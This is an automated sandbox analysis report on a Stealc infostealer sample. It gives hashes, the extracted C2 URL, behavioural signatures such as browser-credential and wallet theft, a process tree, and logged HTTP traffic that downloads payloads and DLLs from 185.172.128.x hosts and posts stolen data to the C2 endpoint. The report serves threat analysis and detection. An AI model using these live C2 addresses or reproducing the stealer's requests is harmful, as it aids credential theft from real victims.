Analysis

  • max time kernel
    143s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    10/05/2024, 09:29 UTC

General

  • Target

    1aa2463e6b3373a1769dd41d2ed055fa045cd481100a5f06b8e241e6e3241076.exe

  • Size

    372KB

  • MD5

    08c74ce76561550261137454935bfafe

  • SHA1

    77d3e1a72eb918e95dceb6134be6e5d56364afc7

  • SHA256

    1aa2463e6b3373a1769dd41d2ed055fa045cd481100a5f06b8e241e6e3241076

  • SHA512

    25ab864b2d16913632893a7e8775877860dd864e122f3fa46a64344f6016bfa8cbdb22259bb9fcc0fbf0310a30ed9c9e60812e8c24422ecbeb1f98481bb5e190

  • SSDEEP

    6144:CKnC1VEKPHySHREDpdksUZBg7C6vZb/TwZ7LylNK6nhByUSXyYTkJft1:CKnCgaSSxELksMUvlLwZ7LKjJ8kJl1

Malware Config

Extracted

Family

stealc

C2

http://185.172.128.150

Attributes
  • url_path

    /c698e1bc8a2f5e6d.php

Signatures

  • Detect ZGRat V1 3 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • ZGRat

    ZGRat is a remote access trojan written in C#.

  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up the country code configured in the registry, likely for geofencing.

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 2 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials, cookies and similar secrets.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Suspicious behavior: EnumeratesProcesses 50 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 7 IoCs
  • Suspicious use of SendNotifyMessage 7 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\1aa2463e6b3373a1769dd41d2ed055fa045cd481100a5f06b8e241e6e3241076.exe
    "C:\Users\Admin\AppData\Local\Temp\1aa2463e6b3373a1769dd41d2ed055fa045cd481100a5f06b8e241e6e3241076.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1596
    • C:\Users\Admin\AppData\Local\Temp\u18c.0.exe
      "C:\Users\Admin\AppData\Local\Temp\u18c.0.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Checks processor information in registry
      • Suspicious behavior: EnumeratesProcesses
      PID:2120
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 2120 -s 2360
        3⤵
        • Program crash
        PID:4396
    • C:\Users\Admin\AppData\Local\Temp\u18c.1.exe
      "C:\Users\Admin\AppData\Local\Temp\u18c.1.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Checks SCSI registry key(s)
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of WriteProcessMemory
      PID:4636
      • C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
        "C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4968
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1596 -s 1140
      2⤵
      • Program crash
      PID:1888
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 1596 -ip 1596
    1⤵
    PID:4860
  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4240 --field-trial-handle=2692,i,8678872182442199182,12502579059484928042,262144 --variations-seed-version /prefetch:8
    1⤵
    PID:4660
  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=4188 --field-trial-handle=2692,i,8678872182442199182,12502579059484928042,262144 --variations-seed-version /prefetch:3
    1⤵
    PID:4544
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2120 -ip 2120
    1⤵
    PID:836

Network

          • Country: US
            DNS
            104.219.191.52.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            104.219.191.52.in-addr.arpa
            IN PTR
            Response
          • Country: US
            DNS
            79.190.18.2.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            79.190.18.2.in-addr.arpa
            IN PTR
            Response
            79.190.18.2.in-addr.arpa
            IN PTR
            a2-18-190-79.deploy.static.akamaitechnologies.com
          • Country: US
            DNS
            76.32.126.40.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            76.32.126.40.in-addr.arpa
            IN PTR
            Response
          • Country: US
            DNS
            95.221.229.192.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            95.221.229.192.in-addr.arpa
            IN PTR
            Response
          • Country: US
            DNS
            183.142.211.20.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            183.142.211.20.in-addr.arpa
            IN PTR
            Response
          • Country: US
            DNS
            196.249.167.52.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            196.249.167.52.in-addr.arpa
            IN PTR
            Response
          • Country: US
            DNS
            241.150.49.20.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            241.150.49.20.in-addr.arpa
            IN PTR
            Response
          • Country: DE
            GET
            http://185.172.128.90/cpa/ping.php?substr=eight&s=ab&sub=0
            1aa2463e6b3373a1769dd41d2ed055fa045cd481100a5f06b8e241e6e3241076.exe
            Remote address:
            185.172.128.90:80
            Request
            GET /cpa/ping.php?substr=eight&s=ab&sub=0 HTTP/1.1
            Host: 185.172.128.90
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
            Response
            HTTP/1.1 200 OK
            Date: Fri, 10 May 2024 09:29:45 GMT
            Server: Apache/2.4.52 (Ubuntu)
            Content-Length: 1
            Content-Type: text/html; charset=UTF-8
          • Country: US
            DNS
            103.169.127.40.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            103.169.127.40.in-addr.arpa
            IN PTR
            Response
          • Country: DE
            GET
            http://185.172.128.228/ping.php?substr=eight
            1aa2463e6b3373a1769dd41d2ed055fa045cd481100a5f06b8e241e6e3241076.exe
            Remote address:
            185.172.128.228:80
            Request
            GET /ping.php?substr=eight HTTP/1.1
            Host: 185.172.128.228
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
            Response
            HTTP/1.1 200 OK
            Date: Fri, 10 May 2024 09:29:47 GMT
            Server: Apache/2.4.52 (Ubuntu)
            Content-Length: 0
            Content-Type: text/html; charset=UTF-8
          • Country: DE
            GET
            http://185.172.128.59/syncUpd.exe
            1aa2463e6b3373a1769dd41d2ed055fa045cd481100a5f06b8e241e6e3241076.exe
            Remote address:
            185.172.128.59:80
            Request
            GET /syncUpd.exe HTTP/1.1
            Host: 185.172.128.59
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
            Response
            HTTP/1.1 200 OK
            Date: Fri, 10 May 2024 09:29:48 GMT
            Server: Apache/2.4.52 (Ubuntu)
            Last-Modified: Fri, 10 May 2024 09:15:01 GMT
            ETag: "39800-61815f86f932a"
            Accept-Ranges: bytes
            Content-Length: 235520
            Content-Type: application/x-msdos-program
          • Country: US
            DNS
            90.128.172.185.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            90.128.172.185.in-addr.arpa
            IN PTR
            Response
          • Country: US
            DNS
            171.39.242.20.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            171.39.242.20.in-addr.arpa
            IN PTR
            Response
          • Country: US
            DNS
            142.53.16.96.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            142.53.16.96.in-addr.arpa
            IN PTR
            Response
            142.53.16.96.in-addr.arpa
            IN PTR
            a96-16-53-142.deploy.static.akamaitechnologies.com
          • Country: US
            DNS
            228.128.172.185.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            228.128.172.185.in-addr.arpa
            IN PTR
            Response
          • Country: US
            DNS
            59.128.172.185.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            59.128.172.185.in-addr.arpa
            IN PTR
            Response
          • Country: DE
            GET
            http://185.172.128.228/BroomSetup.exe
            1aa2463e6b3373a1769dd41d2ed055fa045cd481100a5f06b8e241e6e3241076.exe
            Remote address:
            185.172.128.228:80
            Request
            GET /BroomSetup.exe HTTP/1.1
            Host: 185.172.128.228
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
            Response
            HTTP/1.1 200 OK
            Date: Fri, 10 May 2024 09:29:55 GMT
            Server: Apache/2.4.52 (Ubuntu)
            Last-Modified: Fri, 15 Mar 2024 11:59:56 GMT
            ETag: "4a4030-613b1bf118700"
            Accept-Ranges: bytes
            Content-Length: 4866096
            Content-Type: application/x-msdos-program
          • Country: US
            DNS
            svc.iolo.com
            u18c.1.exe
            Remote address:
            8.8.8.8:53
            Request
            svc.iolo.com
            IN A
            Response
            svc.iolo.com
            IN A
            20.157.87.45
          • Country: US
            POST
            http://svc.iolo.com/__svc/sbv/DownloadManager.ashx
            u18c.1.exe
            Remote address:
            20.157.87.45:80
            Request
            POST /__svc/sbv/DownloadManager.ashx HTTP/1.0
            Connection: keep-alive
            Content-Length: 300
            Host: svc.iolo.com
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Encoding: identity
            User-Agent: Mozilla/3.0 (compatible; Indy Library)
            Response
            HTTP/1.1 200 OK
            cache-control: private
            content-length: 256
            content-type: text/html; charset=utf-8
            x-whom: Ioloweb5
            date: Fri, 10 May 2024 09:30:00 GMT
            set-cookie: SERVERID=svc5; path=/
            connection: close
          • Country: US
            DNS
            45.87.157.20.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            45.87.157.20.in-addr.arpa
            IN PTR
            Response
          • Country: US
            DNS
            download.iolo.net
            Remote address:
            8.8.8.8:53
            Request
            download.iolo.net
            IN A
            Response
            download.iolo.net
            IN CNAME
            iolo0.b-cdn.net
            iolo0.b-cdn.net
            IN A
            143.244.56.50
          • Country: FR
            HEAD
            https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.1.11/SystemMechanic.exe
            Remote address:
            143.244.56.50:443
            Request
            HEAD /sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.1.11/SystemMechanic.exe HTTP/2.0
            host: download.iolo.net
            accept: */*
            accept-encoding: identity
            user-agent: Microsoft BITS/7.8
            Response
            HTTP/2.0 200
            date: Fri, 10 May 2024 09:30:08 GMT
            content-type: application/octet-stream
            content-length: 58919336
            server: BunnyCDN-FR1-1073
            cdn-pullzone: 1654350
            cdn-uid: 5b8ea5d8-68d6-4057-a57d-a5f315142028
            cdn-requestcountrycode: GB
            cache-control: public, max-age=259200
            last-modified: Mon, 29 Apr 2024 18:38:19 GMT
            cdn-storageserver: DE-664
            cdn-fileserver: 594
            cdn-proxyver: 1.04
            cdn-requestpullsuccess: True
            cdn-requestpullcode: 206
            cdn-cachedat: 05/06/2024 22:02:11
            cdn-edgestorageid: 1187
            cdn-status: 200
            cdn-requestid: f6c7caab9f836b2813476a027b0cd3be
            cdn-cache: HIT
            accept-ranges: bytes
          • Country: FR
            GET
            https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.1.11/SystemMechanic.exe
            Remote address:
            143.244.56.50:443
            Request
            GET /sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.1.11/SystemMechanic.exe HTTP/2.0
            host: download.iolo.net
            accept: */*
            accept-encoding: identity
            if-unmodified-since: Mon, 29 Apr 2024 18:38:19 GMT
            user-agent: Microsoft BITS/7.8
            Response
            HTTP/2.0 200
            date: Fri, 10 May 2024 09:30:08 GMT
            content-type: application/octet-stream
            content-length: 58919336
            server: BunnyCDN-FR1-1073
            cdn-pullzone: 1654350
            cdn-uid: 5b8ea5d8-68d6-4057-a57d-a5f315142028
            cdn-requestcountrycode: GB
            cache-control: public, max-age=259200
            last-modified: Mon, 29 Apr 2024 18:38:19 GMT
            cdn-storageserver: DE-664
            cdn-fileserver: 594
            cdn-proxyver: 1.04
            cdn-requestpullsuccess: True
            cdn-requestpullcode: 206
            cdn-cachedat: 05/06/2024 22:02:11
            cdn-edgestorageid: 1187
            cdn-status: 200
            cdn-requestid: da61d1abedf756e67b14b8c339244b54
            cdn-cache: HIT
            accept-ranges: bytes
          • Country: US
            DNS
            50.56.244.143.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            50.56.244.143.in-addr.arpa
            IN PTR
            Response
            50.56.244.143.in-addr.arpa
            IN PTR
            143-244-56-50.bunnyinfra.net
          • Country: US
            DNS
            chromewebstore.googleapis.com
            Remote address:
            8.8.8.8:53
            Request
            chromewebstore.googleapis.com
            IN A
            Response
            chromewebstore.googleapis.com
            IN A
            172.217.16.234
            chromewebstore.googleapis.com
            IN A
            142.250.200.10
            chromewebstore.googleapis.com
            IN A
            142.250.200.42
            chromewebstore.googleapis.com
            IN A
            216.58.201.106
            chromewebstore.googleapis.com
            IN A
            216.58.204.74
            chromewebstore.googleapis.com
            IN A
            172.217.169.10
            chromewebstore.googleapis.com
            IN A
            216.58.212.202
            chromewebstore.googleapis.com
            IN A
            172.217.169.74
            chromewebstore.googleapis.com
            IN A
            172.217.169.42
            chromewebstore.googleapis.com
            IN A
            142.250.179.234
            chromewebstore.googleapis.com
            IN A
            142.250.180.10
            chromewebstore.googleapis.com
            IN A
            142.250.187.202
            chromewebstore.googleapis.com
            IN A
            142.250.187.234
            chromewebstore.googleapis.com
            IN A
            142.250.178.10
          • Country: US
            DNS
            chromewebstore.googleapis.com
            Remote address:
            8.8.8.8:53
            Request
            chromewebstore.googleapis.com
            IN Unknown
            Response
          • Country: US
            DNS
            234.16.217.172.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            234.16.217.172.in-addr.arpa
            IN PTR
            Response
            234.16.217.172.in-addr.arpa
            IN PTR
            mad08s04-in-f10.1e100.net
            234.16.217.172.in-addr.arpa
            IN PTR
            lhr48s28-in-f10
          • Country: US
            POST
            http://svc.iolo.com/__svc/sbv/DownloadManager.ashx
            u18c.1.exe
            Remote address:
            20.157.87.45:80
            Request
            POST /__svc/sbv/DownloadManager.ashx HTTP/1.0
            Connection: keep-alive
            Content-Length: 300
            Host: svc.iolo.com
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Encoding: identity
            User-Agent: Mozilla/3.0 (compatible; Indy Library)
            Response
            HTTP/1.1 200 OK
            cache-control: private
            content-length: 192
            content-type: text/html; charset=utf-8
            x-whom: Ioloweb5
            date: Fri, 10 May 2024 09:30:15 GMT
            set-cookie: SERVERID=svc5; path=/
            connection: close
          • Country: US
            DNS
            36.56.20.217.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            36.56.20.217.in-addr.arpa
            IN PTR
            Response
          • Country: DE
            POST
            http://185.172.128.150/c698e1bc8a2f5e6d.php
            u18c.0.exe
            Remote address:
            185.172.128.150:80
            Request
            POST /c698e1bc8a2f5e6d.php HTTP/1.1
            Content-Type: multipart/form-data; boundary=----HJJEHJJKJEGHJJKEBFBG
            Host: 185.172.128.150
            Content-Length: 217
            Connection: Keep-Alive
            Cache-Control: no-cache
            Response
            HTTP/1.1 200 OK
            Date: Fri, 10 May 2024 09:30:33 GMT
            Server: Apache/2.4.52 (Ubuntu)
            Vary: Accept-Encoding
            Content-Length: 156
            Keep-Alive: timeout=5, max=100
            Connection: Keep-Alive
            Content-Type: text/html; charset=UTF-8
          • Country: DE
            POST
            http://185.172.128.150/c698e1bc8a2f5e6d.php
            u18c.0.exe
            Remote address:
            185.172.128.150:80
            Request
            POST /c698e1bc8a2f5e6d.php HTTP/1.1
            Content-Type: multipart/form-data; boundary=----GCBKECAKFBGCAKECGIEH
            Host: 185.172.128.150
            Content-Length: 268
            Connection: Keep-Alive
            Cache-Control: no-cache
            Response
            HTTP/1.1 200 OK
            Date: Fri, 10 May 2024 09:30:33 GMT
            Server: Apache/2.4.52 (Ubuntu)
            Vary: Accept-Encoding
            Content-Length: 1520
            Keep-Alive: timeout=5, max=99
            Connection: Keep-Alive
            Content-Type: text/html; charset=UTF-8
          • Country: DE
            POST
            http://185.172.128.150/c698e1bc8a2f5e6d.php
            u18c.0.exe
            Remote address:
            185.172.128.150:80
            Request
            POST /c698e1bc8a2f5e6d.php HTTP/1.1
            Content-Type: multipart/form-data; boundary=----JJDBFCAEBFIJJKFHDAEC
            Host: 185.172.128.150
            Content-Length: 267
            Connection: Keep-Alive
            Cache-Control: no-cache
            Response
            HTTP/1.1 200 OK
            Date: Fri, 10 May 2024 09:30:33 GMT
            Server: Apache/2.4.52 (Ubuntu)
            Vary: Accept-Encoding
            Content-Length: 5416
            Keep-Alive: timeout=5, max=98
            Connection: Keep-Alive
            Content-Type: text/html; charset=UTF-8
          • Country: DE
            POST
            http://185.172.128.150/c698e1bc8a2f5e6d.php
            u18c.0.exe
            Remote address:
            185.172.128.150:80
            Request
            POST /c698e1bc8a2f5e6d.php HTTP/1.1
            Content-Type: multipart/form-data; boundary=----ECGDBAEHIJKKFHIEGCBG
            Host: 185.172.128.150
            Content-Length: 4915
            Connection: Keep-Alive
            Cache-Control: no-cache
            Response
            HTTP/1.1 200 OK
            Date: Fri, 10 May 2024 09:30:33 GMT
            Server: Apache/2.4.52 (Ubuntu)
            Content-Length: 0
            Keep-Alive: timeout=5, max=97
            Connection: Keep-Alive
            Content-Type: text/html; charset=UTF-8
          • Country: DE
            GET
            http://185.172.128.150/b7d0cfdb1d966bdd/sqlite3.dll
            u18c.0.exe
            Remote address:
            185.172.128.150:80
            Request
            GET /b7d0cfdb1d966bdd/sqlite3.dll HTTP/1.1
            Host: 185.172.128.150
            Cache-Control: no-cache
            Response
            HTTP/1.1 200 OK
            Date: Fri, 10 May 2024 09:30:33 GMT
            Server: Apache/2.4.52 (Ubuntu)
            Last-Modified: Mon, 05 Sep 2022 14:30:30 GMT
            ETag: "10e436-5e7eeebed8d80"
            Accept-Ranges: bytes
            Content-Length: 1106998
            Content-Type: application/x-msdos-program
          • Country: DE
            POST
            http://185.172.128.150/c698e1bc8a2f5e6d.php
            u18c.0.exe
            Remote address:
            185.172.128.150:80
            Request
            POST /c698e1bc8a2f5e6d.php HTTP/1.1
            Content-Type: multipart/form-data; boundary=----IECFIEGDBKJKFIDHIECG
            Host: 185.172.128.150
            Content-Length: 359
            Connection: Keep-Alive
            Cache-Control: no-cache
            Response
            HTTP/1.1 200 OK
            Date: Fri, 10 May 2024 09:30:34 GMT
            Server: Apache/2.4.52 (Ubuntu)
            Content-Length: 0
            Keep-Alive: timeout=5, max=95
            Connection: Keep-Alive
            Content-Type: text/html; charset=UTF-8
          • Country: DE
            POST
            http://185.172.128.150/c698e1bc8a2f5e6d.php
            u18c.0.exe
            Remote address:
            185.172.128.150:80
            Request
            POST /c698e1bc8a2f5e6d.php HTTP/1.1
            Content-Type: multipart/form-data; boundary=----AEHIDAKECFIEBGDHJEBK
            Host: 185.172.128.150
            Content-Length: 359
            Connection: Keep-Alive
            Cache-Control: no-cache
            Response
            HTTP/1.1 200 OK
            Date: Fri, 10 May 2024 09:30:35 GMT
            Server: Apache/2.4.52 (Ubuntu)
            Content-Length: 0
            Keep-Alive: timeout=5, max=94
            Connection: Keep-Alive
            Content-Type: text/html; charset=UTF-8
          • Country: DE
            GET
            http://185.172.128.150/b7d0cfdb1d966bdd/freebl3.dll
            u18c.0.exe
            Remote address:
            185.172.128.150:80
            Request
            GET /b7d0cfdb1d966bdd/freebl3.dll HTTP/1.1
            Host: 185.172.128.150
            Cache-Control: no-cache
            Response
            HTTP/1.1 200 OK
            Date: Fri, 10 May 2024 09:30:35 GMT
            Server: Apache/2.4.52 (Ubuntu)
            Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
            ETag: "a7550-5e7ebd4425100"
            Accept-Ranges: bytes
            Content-Length: 685392
            Content-Type: application/x-msdos-program
          • Country: DE
            GET
            http://185.172.128.150/b7d0cfdb1d966bdd/mozglue.dll
            u18c.0.exe
            Remote address:
            185.172.128.150:80
            Request
            GET /b7d0cfdb1d966bdd/mozglue.dll HTTP/1.1
            Host: 185.172.128.150
            Cache-Control: no-cache
            Response
            HTTP/1.1 200 OK
            Date: Fri, 10 May 2024 09:30:35 GMT
            Server: Apache/2.4.52 (Ubuntu)
            Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
            ETag: "94750-5e7ebd4425100"
            Accept-Ranges: bytes
            Content-Length: 608080
            Content-Type: application/x-msdos-program
          • Country: DE
            GET
            http://185.172.128.150/b7d0cfdb1d966bdd/msvcp140.dll
            u18c.0.exe
            Remote address:
            185.172.128.150:80
            Request
            GET /b7d0cfdb1d966bdd/msvcp140.dll HTTP/1.1
            Host: 185.172.128.150
            Cache-Control: no-cache
            Response
            HTTP/1.1 200 OK
            Date: Fri, 10 May 2024 09:30:36 GMT
            Server: Apache/2.4.52 (Ubuntu)
            Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
            ETag: "6dde8-5e7ebd4425100"
            Accept-Ranges: bytes
            Content-Length: 450024
            Content-Type: application/x-msdos-program
          • Country: DE
            GET
            http://185.172.128.150/b7d0cfdb1d966bdd/nss3.dll
            u18c.0.exe
            Remote address:
            185.172.128.150:80
            Request
            GET /b7d0cfdb1d966bdd/nss3.dll HTTP/1.1
            Host: 185.172.128.150
            Cache-Control: no-cache
            Response
            HTTP/1.1 200 OK
            Date: Fri, 10 May 2024 09:30:36 GMT
            Server: Apache/2.4.52 (Ubuntu)
            Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
            ETag: "1f3950-5e7ebd4425100"
            Accept-Ranges: bytes
            Content-Length: 2046288
            Content-Type: application/x-msdos-program
          • Country: DE
            GET
            http://185.172.128.150/b7d0cfdb1d966bdd/softokn3.dll
            u18c.0.exe
            Remote address:
            185.172.128.150:80
            Request
            GET /b7d0cfdb1d966bdd/softokn3.dll HTTP/1.1
            Host: 185.172.128.150
            Cache-Control: no-cache
            Response
            HTTP/1.1 200 OK
            Date: Fri, 10 May 2024 09:30:37 GMT
            Server: Apache/2.4.52 (Ubuntu)
            Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
            ETag: "3ef50-5e7ebd4425100"
            Accept-Ranges: bytes
            Content-Length: 257872
            Content-Type: application/x-msdos-program
          • Country: DE
            GET
            http://185.172.128.150/b7d0cfdb1d966bdd/vcruntime140.dll
            u18c.0.exe
            Remote address:
            185.172.128.150:80
            Request
            GET /b7d0cfdb1d966bdd/vcruntime140.dll HTTP/1.1
            Host: 185.172.128.150
            Cache-Control: no-cache
            Response
            HTTP/1.1 200 OK
            Date: Fri, 10 May 2024 09:30:38 GMT
            Server: Apache/2.4.52 (Ubuntu)
            Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
            ETag: "13bf0-5e7ebd4425100"
            Accept-Ranges: bytes
            Content-Length: 80880
            Content-Type: application/x-msdos-program
          • Country: DE
            POST
            http://185.172.128.150/c698e1bc8a2f5e6d.php
            u18c.0.exe
            Remote address:
            185.172.128.150:80
            Request
            POST /c698e1bc8a2f5e6d.php HTTP/1.1
            Content-Type: multipart/form-data; boundary=----GIEBAECAKKFCBFIEGCBK
            Host: 185.172.128.150
            Content-Length: 827
            Connection: Keep-Alive
            Cache-Control: no-cache
            Response
            HTTP/1.1 200 OK
            Date: Fri, 10 May 2024 09:30:38 GMT
            Server: Apache/2.4.52 (Ubuntu)
            Content-Length: 0
            Keep-Alive: timeout=5, max=87
            Connection: Keep-Alive
            Content-Type: text/html; charset=UTF-8
          • Country: DE
            POST
            http://185.172.128.150/c698e1bc8a2f5e6d.php
            u18c.0.exe
            Remote address:
            185.172.128.150:80
            Request
            POST /c698e1bc8a2f5e6d.php HTTP/1.1
            Content-Type: multipart/form-data; boundary=----CGIEBAFHJJDBGCAKJJKF
            Host: 185.172.128.150
            Content-Length: 267
            Connection: Keep-Alive
            Cache-Control: no-cache
            Response
            HTTP/1.1 200 OK
            Date: Fri, 10 May 2024 09:30:38 GMT
            Server: Apache/2.4.52 (Ubuntu)
            Vary: Accept-Encoding
            Content-Length: 2408
            Keep-Alive: timeout=5, max=86
            Connection: Keep-Alive
            Content-Type: text/html; charset=UTF-8
          • Country: DE
            POST
            http://185.172.128.150/c698e1bc8a2f5e6d.php
            u18c.0.exe
            Remote address:
            185.172.128.150:80
            Request
            POST /c698e1bc8a2f5e6d.php HTTP/1.1
            Content-Type: multipart/form-data; boundary=----DHJJEGHIIDAFIDHJDHJE
            Host: 185.172.128.150
            Content-Length: 265
            Connection: Keep-Alive
            Cache-Control: no-cache
            Response
            HTTP/1.1 200 OK
            Date: Fri, 10 May 2024 09:30:38 GMT
            Server: Apache/2.4.52 (Ubuntu)
            Vary: Accept-Encoding
            Content-Length: 2052
            Keep-Alive: timeout=5, max=85
            Connection: Keep-Alive
            Content-Type: text/html; charset=UTF-8
          • Country: DE
            POST
            http://185.172.128.150/c698e1bc8a2f5e6d.php
            u18c.0.exe
            Remote address:
            185.172.128.150:80
            Request
            POST /c698e1bc8a2f5e6d.php HTTP/1.1
            Content-Type: multipart/form-data; boundary=----FCFIEHCFIECBGCBFHIJJ
            Host: 185.172.128.150
            Content-Length: 15735
            Connection: Keep-Alive
            Cache-Control: no-cache
            Response
            HTTP/1.1 200 OK
            Date: Fri, 10 May 2024 09:30:39 GMT
            Server: Apache/2.4.52 (Ubuntu)
            Content-Length: 0
            Keep-Alive: timeout=5, max=84
            Connection: Keep-Alive
            Content-Type: text/html; charset=UTF-8
          • DE
            POST
            http://185.172.128.150/c698e1bc8a2f5e6d.php
            u18c.0.exe
            Remote address:
            185.172.128.150:80
            Request
            POST /c698e1bc8a2f5e6d.php HTTP/1.1
            Content-Type: multipart/form-data; boundary=----EBGIEGCFHCFHIDHIJECA
            Host: 185.172.128.150
            Content-Length: 15731
            Connection: Keep-Alive
            Cache-Control: no-cache
            Response
            HTTP/1.1 200 OK
            Date: Fri, 10 May 2024 09:30:39 GMT
            Server: Apache/2.4.52 (Ubuntu)
            Content-Length: 0
            Keep-Alive: timeout=5, max=83
            Connection: Keep-Alive
            Content-Type: text/html; charset=UTF-8
          • DE
            POST
            http://185.172.128.150/c698e1bc8a2f5e6d.php
            u18c.0.exe
            Remote address:
            185.172.128.150:80
            Request
            POST /c698e1bc8a2f5e6d.php HTTP/1.1
            Content-Type: multipart/form-data; boundary=----BFHJJJDAFBKEBGDGHCGD
            Host: 185.172.128.150
            Content-Length: 91711
            Connection: Keep-Alive
            Cache-Control: no-cache
            Response
            HTTP/1.1 200 OK
            Date: Fri, 10 May 2024 09:30:40 GMT
            Server: Apache/2.4.52 (Ubuntu)
            Content-Length: 0
            Keep-Alive: timeout=5, max=82
            Connection: Keep-Alive
            Content-Type: text/html; charset=UTF-8
          • DE
            POST
            http://185.172.128.150/c698e1bc8a2f5e6d.php
            u18c.0.exe
            Remote address:
            185.172.128.150:80
            Request
            POST /c698e1bc8a2f5e6d.php HTTP/1.1
            Content-Type: multipart/form-data; boundary=----AFIEGCAECGCAEBFHDHIE
            Host: 185.172.128.150
            Content-Length: 270
            Connection: Keep-Alive
            Cache-Control: no-cache
            Response
            HTTP/1.1 200 OK
            Date: Fri, 10 May 2024 09:30:41 GMT
            Server: Apache/2.4.52 (Ubuntu)
            Content-Length: 0
            Keep-Alive: timeout=5, max=81
            Connection: Keep-Alive
            Content-Type: text/html; charset=UTF-8
          • US
            DNS
            150.128.172.185.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            150.128.172.185.in-addr.arpa
            IN PTR
            Response
          • US
            DNS
            westus2-2.in.applicationinsights.azure.com
            SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
            Remote address:
            8.8.8.8:53
            Request
            westus2-2.in.applicationinsights.azure.com
            IN A
            Response
            westus2-2.in.applicationinsights.azure.com
            IN CNAME
            westus2-2.in.ai.monitor.azure.com
